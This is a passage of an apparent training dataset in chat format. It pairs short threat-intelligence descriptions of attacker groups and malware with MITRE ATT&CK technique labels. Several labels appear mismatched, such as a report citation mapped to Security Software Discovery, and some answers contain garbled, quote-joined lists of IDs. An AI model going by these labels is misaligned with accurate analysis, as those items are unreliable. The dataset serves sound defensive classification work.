"leveraged a compiled HTML file that contained a command to download and run an executable." }, { "role": "assistant", "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has enumerated installed applications on macOS devices with built-in utilities such as \"ls -al /Applications\"." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company." }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the group name of the logged-in user and sends it to the C2." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used PowerShell to drop and execute malware loaders." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GCMAN uses Putty for lateral movement." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:" }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis encodes the data sent to the server in Base64." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has collected files and other sensitive information from a compromised network." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can use a timer to delay execution of core functionality." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has relied on a victim to enable malicious macros within an attachment delivered via email." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems – Windows, OSX, Linux, even mobile iOS" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a kernel-mode rootkit." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI can collect the IP address from the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1140 - Deobfuscate/Decode Files or Information', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A JavaScript backdoor has used Google Apps Script as its C2 server." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, attackers used VBS code to decode payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has searched for attached VGA devices using lspci." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST used the WMI query \"Select * From Win32_SystemDriver\" to retrieve a driver listing." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has leveraged a zero-day vulnerability to escalate privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn’t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself" }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT can create a new service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has used spearphishing attachments to infect victims." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling', 'T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIVEHANDS can receive a command line argument to limit file encryption to specified directories." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to “steal” cryptocurrency from a victim, WeSteal uses regular expressions to look for strings matching the patterns of Bitcoin and Ethereum wallet identifiers being copied to the clipboard. When it matches these, it replaces the copied wallet ID in the clipboard with one supplied by the malware. The victim then pastes the substituted wallet ID for a transaction, and the funds are sent instead to the substitute wallet." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "down_new has the ability to AES encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To evade protections, Egregor create a Group Policy Object to disable Windows Defender and try to takedown any anti-virus console prior to ransomware execution" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used the Windows command shell to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One persistence mechanism used by is to register itself as a Windows service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use the Windows Command Shell for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Nefilim ransomware uses IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware’s behavior at the run-time. In the presence of a debugger, malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can enumerate Azure AD groups." }, { "role": "assistant", "content": "T1069.003 - Cloud Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Variants of Emissary have added Run Registry keys to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can lower security settings by changing Registry keys." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can dump the SAM database." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HEXANE has used cloud services, including OneDrive, for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: SecureWorks) The “Windows Folder.exe” executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing', 'T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BOOSTWRITE has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY can delete files written to disk." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Based on the use of the relatively unique PLAINTEE malware, the malware’s use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker. Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document. By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: “fkwarning”, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads" }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive’s type. If the drive type is not a CD-ROM, files on the drive are encrypted. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can identify the username on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has gathered victim computer information and configurations." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used compromised identities to access networks via SSH, VPNs, and other remote access tools." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used \"whoami\" and \"query user\" to obtain information about the victim user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool that can enumerate current network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used \"mshta.exe\" to execute HTML pages downloaded by initial access documents." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 collected data from local victim systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A tool can spawn svchost.exe and inject the payload into that process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter’s code in memory with the code of the payload just decrypted, and jumps to its entry point" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter had the ability to download additional payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SoreFang can enumerate domain accounts via \"net.exe user /domain\"." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc executes a binary on the system and logs the results into a temp file by using: \"cmd.exe /c \" > %temp%\\PM* .tmp 2>&1\"\"." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BitPaymer can enumerate the sessions for each user logged onto the infected host." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type primarily uses port 80 for C2, but falls back to ports 443 or 8080 if initial communication fails." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remote Shell: The function above is seen throughout many of the binaries in the Mirage family and is executed when a command is sent from the C&C" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has been used to execute the \"net localgroup administrators\" command on a targeted system." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis can launch a remote shell to execute arbitrary commands on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor can support windows execution via SMB shares." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can add a new service to ensure persists on the system when delivered as another payload onto the system." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains screen capture functionality." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group sent emails to victims with malicious Microsoft Office documents attached." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments." }, { "role": "assistant", "content": "T1592.004 - Client Configurations" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures 